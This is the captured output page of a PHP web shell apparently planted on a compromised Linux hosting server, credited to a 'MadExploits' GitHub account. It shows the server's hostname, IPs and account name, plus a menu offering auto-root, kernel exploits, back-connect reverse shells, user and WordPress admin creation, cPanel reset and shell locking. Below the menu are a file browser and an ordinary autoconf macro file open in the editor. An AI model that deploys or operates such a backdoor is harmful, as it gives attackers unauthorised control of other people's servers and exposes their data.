Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
aclocal /
[ HOME SHELL ]
Name
Size
Permission
Action
bison-i18n.m4
1.89
KB
-rw-r--r--
dovecot-pigeonhole.m4
1.85
KB
-rw-r--r--
freetype2.m4
6.2
KB
-rw-r--r--
gettext.m4
14.15
KB
-rw-r--r--
glib-2.0.m4
8.17
KB
-rw-r--r--
glib-gettext.m4
15.38
KB
-rw-r--r--
gpg-error.m4
7.96
KB
-rw-r--r--
gpgrt.m4
3.99
KB
-rw-r--r--
gsettings.m4
3.5
KB
-rw-r--r--
host-cpu-c-abi.m4
21.91
KB
-rw-r--r--
iconv.m4
9.5
KB
-rw-r--r--
intlmacosx.m4
3.15
KB
-rw-r--r--
lib-ld.m4
5.24
KB
-rw-r--r--
lib-link.m4
33.99
KB
-rw-r--r--
lib-prefix.m4
11.66
KB
-rw-r--r--
libtool.m4
298.69
KB
-rw-r--r--
libxml.m4
7.72
KB
-rw-r--r--
libxslt.m4
7.93
KB
-rw-r--r--
ltargz.m4
2.51
KB
-rw-r--r--
ltdl.m4
29.33
KB
-rw-r--r--
ltoptions.m4
14.17
KB
-rw-r--r--
ltsugar.m4
4.28
KB
-rw-r--r--
ltversion.m4
699
B
-rw-r--r--
lt~obsolete.m4
6
KB
-rw-r--r--
mysql.m4
4.47
KB
-rw-r--r--
nls.m4
1.21
KB
-rw-r--r--
pkg.m4
12.37
KB
-rw-r--r--
po.m4
18.39
KB
-rw-r--r--
progtest.m4
3.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dovecot-pigeonhole.m4
# pigeonhole.m4 - Check presence of pigeonhole -*-Autoconf-*- #. # serial 5 AC_DEFUN([DC_PIGEONHOLE],[ AC_ARG_WITH(pigeonhole, [ --with-pigeonhole=DIR Pigeonhole base directory], pigeonholedir="$withval", [ pg_prefix=$prefix test "x$pg_prefix" = xNONE && pg_prefix=$ac_default_prefix pigeonholedir="$pg_prefix/include/dovecot/sieve" ] ) AC_MSG_CHECKING([for pigeonhole in "$pigeonholedir"]) top=`pwd` cd $pigeonholedir pigeonholedir=`pwd` cd $top AC_SUBST(pigeonholedir) PIGEONHOLE_TESTSUITE= if test -f "$pigeonholedir/src/lib-sieve/sieve.h"; then AC_MSG_RESULT([found]) pigeonhole_incdir="$pigeonholedir" LIBSIEVE_INCLUDE='\ -I$(pigeonhole_incdir) \ -I$(pigeonhole_incdir)/src/lib-sieve \ -I$(pigeonhole_incdir)/src/lib-sieve/util \ -I$(pigeonhole_incdir)/src/lib-sieve/plugins/copy \ -I$(pigeonhole_incdir)/src/lib-sieve/plugins/enotify \ -I$(pigeonhole_incdir)/src/lib-sieve/plugins/imap4flags \ -I$(pigeonhole_incdir)/src/lib-sieve/plugins/mailbox \ -I$(pigeonhole_incdir)/src/lib-sieve/plugins/variables' PIGEONHOLE_TESTSUITE="${pigeonholedir}/src/testsuite/testsuite" elif test -f "$pigeonholedir/sieve.h"; then AC_MSG_RESULT([found]) pigeonhole_incdir="$pigeonholedir" LIBSIEVE_INCLUDE='-I$(pigeonhole_incdir)' else AC_MSG_RESULT([not found]) AC_MSG_NOTICE([ Pigeonhole Sieve headers not found from $pigeonholedir and they are not installed in the Dovecot include path, use --with-pigeonhole=PATH to give path to Pigeonhole sources or installed headers.]) AC_MSG_ERROR([pigeonhole not found]) fi DISTCHECK_CONFIGURE_FLAGS="$DISTCHECK_CONFIGURE_FLAGS --with-pigeonhole=$pigeonholedir" AM_CONDITIONAL(PIGEONHOLE_TESTSUITE_AVAILABLE, ! test -z "$PIGEONHOLE_TESTSUITE") pigeonhole_incdir="$pigeonholedir" AC_SUBST(pigeonhole_incdir) AC_SUBST(LIBSIEVE_INCLUDE) AC_SUBST(PIGEONHOLE_TESTSUITE) ])
Close